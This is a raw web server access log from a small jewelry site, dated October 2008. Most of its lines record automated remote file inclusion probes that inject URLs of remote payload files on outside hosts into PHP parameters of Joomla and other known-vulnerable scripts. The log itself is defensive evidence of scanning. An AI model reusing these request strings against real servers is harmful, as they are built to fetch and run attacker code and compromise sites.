202.171.48.89 - - [30/Oct/2008:22:09:59 -0700] "GET /errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:22:09:59 -0700] "GET /errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
75.151.18.250 - - [30/Oct/2008:22:13:50 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [30/Oct/2008:22:13:50 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
68.7.200.237 - - [30/Oct/2008:22:13:53 -0700] "GET / HTTP/1.1" 200 779 "http://www.directoryjewelry.com/handcrafted/custom-handmade/4.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.sojewels.com"
68.7.200.237 - - [30/Oct/2008:22:13:54 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "sojewels.com"
67.205.112.106 - - [30/Oct/2008:22:14:07 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://twoxis.web.cedant.com/l333tbi1t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sojewels.com"
67.205.112.106 - - [30/Oct/2008:22:14:32 -0700] "GET /logs/access_080701.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://twoxis.web.cedant.com/l333tbi1t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sojewels.com"
67.205.112.106 - - [30/Oct/2008:22:14:32 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://twoxis.web.cedant.com/l333tbi1t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sojewels.com"
88.84.145.169 - - [30/Oct/2008:22:21:40 -0700] "GET /logs/access_080501.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
67.205.112.106 - - [30/Oct/2008:22:31:27 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://twoxis.web.cedant.com/l333tbi1t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sojewels.com"
67.205.112.106 - - [30/Oct/2008:22:31:27 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://twoxis.web.cedant.com/l333tbi1t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sojewels.com"
67.205.112.106 - - [30/Oct/2008:22:31:27 -0700] "GET /logs/access_080531.log/convert/mvcw.php?step=1&vwar_root=http://twoxis.web.cedant.com/l333tbi1t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:34:01 -0700] "GET /logs/access_081001.log//include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
70.86.69.138 - - [30/Oct/2008:22:34:51 -0700] "GET /logs/access_081001.log//include/write.php?dir=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sojewels.com"
59.125.183.76 - - [30/Oct/2008:22:37:02 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
59.125.183.76 - - [30/Oct/2008:22:37:02 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:22:37:50 -0700] "GET /logs/scripts.log/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.171.48.89 - - [30/Oct/2008:22:37:51 -0700] "GET /logs/scripts.log/errors.php?error=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:22:38:33 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:22:38:33 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:22:38:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
208.36.144.7 - - [30/Oct/2008:22:39:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sojewels.com"
216.137.72.10 - - [30/Oct/2008:22:41:23 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:22:44:13 -0700] "GET /logs/access.log/error.php?error=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:22:44:13 -0700] "GET /error.php?error=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.17.107.161 - - [30/Oct/2008:22:44:13 -0700] "GET /logs/error.php?error=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:22:52:16 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:22:52:16 -0700] "GET /logs/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 1796 "-" "Mozilla/5.0" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:22:54:49 -0700] "GET /logs/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 1796 "-" "Mozilla/5.0" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:22:54:49 -0700] "GET /logs/access.log/?sourcedir=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
219.85.63.226 - - [30/Oct/2008:22:57:23 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
219.85.63.226 - - [30/Oct/2008:22:57:24 -0700] "GET /logs/access.log//include/monitoring/engine/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
219.85.63.226 - - [30/Oct/2008:22:57:25 -0700] "GET /include/monitoring/engine/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
89.111.176.64 - - [30/Oct/2008:23:00:36 -0700] "GET /poll/poll_ssi.php?include_path=http://geocities.com/zell1980/puisi/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.sojewels.com"
89.111.176.64 - - [30/Oct/2008:23:00:36 -0700] "GET /logs/access.log//poll/poll_ssi.php?include_path=http://geocities.com/zell1980/puisi/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.sojewels.com"
89.111.176.64 - - [30/Oct/2008:23:00:36 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://geocities.com/zell1980/puisi/idv6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:23:18:13 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 1801 "-" "Mozilla/5.0" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:23:18:13 -0700] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:23:18:52 -0700] "GET /logs/access_080531.log%20%20//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:23:21:47 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:23:21:47 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.222.25.87 - - [30/Oct/2008:23:21:47 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:23:24:08 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:23:24:08 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.206.182.158 - - [30/Oct/2008:23:24:08 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:23:28:01 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:23:28:02 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:23:28:02 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:23:29:59 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:23:29:59 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:23:29:59 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.13.222.135 - - [30/Oct/2008:23:32:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.13.222.135 - - [30/Oct/2008:23:32:52 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.13.222.135 - - [30/Oct/2008:23:32:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.78.216.197 - - [30/Oct/2008:23:35:51 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.sojewels.com"
82.78.216.197 - - [30/Oct/2008:23:35:51 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.sojewels.com"
82.78.216.197 - - [30/Oct/2008:23:35:51 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:23:37:04 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:23:37:07 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:23:37:07 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:23:37:12 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.78.216.197 - - [30/Oct/2008:23:37:25 -0700] "GET /logs/access_081001.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:23:37:39 -0700] "GET /logs/access_080531.log//newspublish/include.php?path%5Bdocroot%5D=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.78.216.197 - - [30/Oct/2008:23:39:24 -0700] "GET /logs/access_081001.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.grig.com/idv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.sojewels.com"
78.111.80.12 - - [30/Oct/2008:23:53:16 -0700] "GET /logs/access_080531.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [30/Oct/2008:23:53:16 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [30/Oct/2008:23:53:16 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [30/Oct/2008:23:54:17 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
59.125.183.76 - - [30/Oct/2008:23:59:43 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
59.125.183.76 - - [30/Oct/2008:23:59:43 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:12:51 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:12:51 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:12:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:13:52 -0700] "GET /logs/access.log/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:13:52 -0700] "GET /errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:13:52 -0700] "GET /logs/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
208.226.79.133 - - [31/Oct/2008:00:14:24 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [31/Oct/2008:00:14:24 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [31/Oct/2008:00:14:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [31/Oct/2008:00:14:35 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [31/Oct/2008:00:14:35 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
208.226.79.133 - - [31/Oct/2008:00:14:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:15:20 -0700] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:16:34 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:16:34 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:16:34 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:17:06 -0700] "GET /errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:18:34 -0700] "GET /logs/access_081001.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
38.99.13.121 - - [31/Oct/2008:00:20:06 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "sojewels.com"
72.9.247.34 - - [31/Oct/2008:00:20:32 -0700] "GET /logs/access_081001.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:00:20:38 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:00:20:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:00:20:38 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:00:21:38 -0700] "GET /logs/access_081001.log/joomla/index.php?option=com_restaurante&task=http://www.nk.ca/tikiwiki/styles/geo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:00:22:49 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
78.111.80.12 - - [31/Oct/2008:00:22:49 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nk.ca/tikiwiki/styles/geo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
124.0.208.252 - - [31/Oct/2008:00:26:32 -0700] "GET /?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
124.0.208.252 - - [31/Oct/2008:00:26:32 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
124.0.208.252 - - [31/Oct/2008:00:26:32 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 200 1801 "-" "libwww-perl/5.79" "www.sojewels.com"
124.0.208.252 - - [31/Oct/2008:00:26:33 -0700] "GET /?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
124.0.208.252 - - [31/Oct/2008:00:26:34 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/tutimasripah/idv6.txt????? HTTP/1.1" 200 1801 "-" "libwww-perl/5.79" "www.sojewels.com"
140.130.101.5 - - [31/Oct/2008:00:31:00 -0700] "GET /logs/access.log/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
140.130.101.5 - - [31/Oct/2008:00:31:00 -0700] "GET /logs/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
140.130.101.5 - - [31/Oct/2008:00:31:13 -0700] "GET /logs/access.log/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
140.130.101.5 - - [31/Oct/2008:00:31:13 -0700] "GET /logs/errors.php?error=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
75.151.18.250 - - [31/Oct/2008:00:34:29 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [31/Oct/2008:00:34:29 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [31/Oct/2008:00:34:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [31/Oct/2008:00:35:33 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [31/Oct/2008:00:35:33 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
75.151.18.250 - - [31/Oct/2008:00:35:34 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://solca-ws.bogotanos.net/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
59.125.183.76 - - [31/Oct/2008:00:35:39 -0700] "GET /logs/errors.php?error=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
59.125.183.76 - - [31/Oct/2008:00:35:39 -0700] "GET /errors.php?error=http://www.grig.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
